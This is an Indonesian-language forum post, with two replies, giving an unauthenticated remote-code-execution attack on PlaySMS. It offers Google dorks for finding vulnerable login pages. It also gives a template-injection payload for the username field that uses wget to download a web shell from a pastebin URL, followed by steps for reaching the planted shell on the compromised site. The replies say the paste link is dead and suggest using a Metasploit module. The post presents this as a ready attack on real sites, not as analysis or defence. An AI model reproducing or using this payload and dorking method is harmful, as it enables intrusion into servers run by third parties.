PlaySMS Unauthenticated RCE

Bayu_Santoso

Google Dork :

inurl:?app=main intitle:sms
inurl:?app=main intext:"recover password"
#Payload RCE :
{{wget https://pastebin.com/raw/YNpriSQu -O linuxploit.php}}

Langkah-Langkah Exploitasi

kalian dorking dulu
jika sudah menemukan target maka akan muncul tempat login
pada bagian username, masukkan payload rce :
{{wget https://pastebin.com/raw/YNpriSQu -O linuxploit.php}}
Note : linuxploit.php bisa kalian ubah dengan nama sesuka kalian
masukkan payload RCE pada username
Access shell ?? site.com/shell.php / site.com/[path]/shell.php

Referensi :
https://sec.linuxploit.com/2020/04/playsms-unauthenticated-rce-upload-shell.html

kyo1337

tolong update raw pastebinnya gan, linknya sudah 404

lastname

kyo1337 bisa pake modul yang sudah ada di metsaploit gan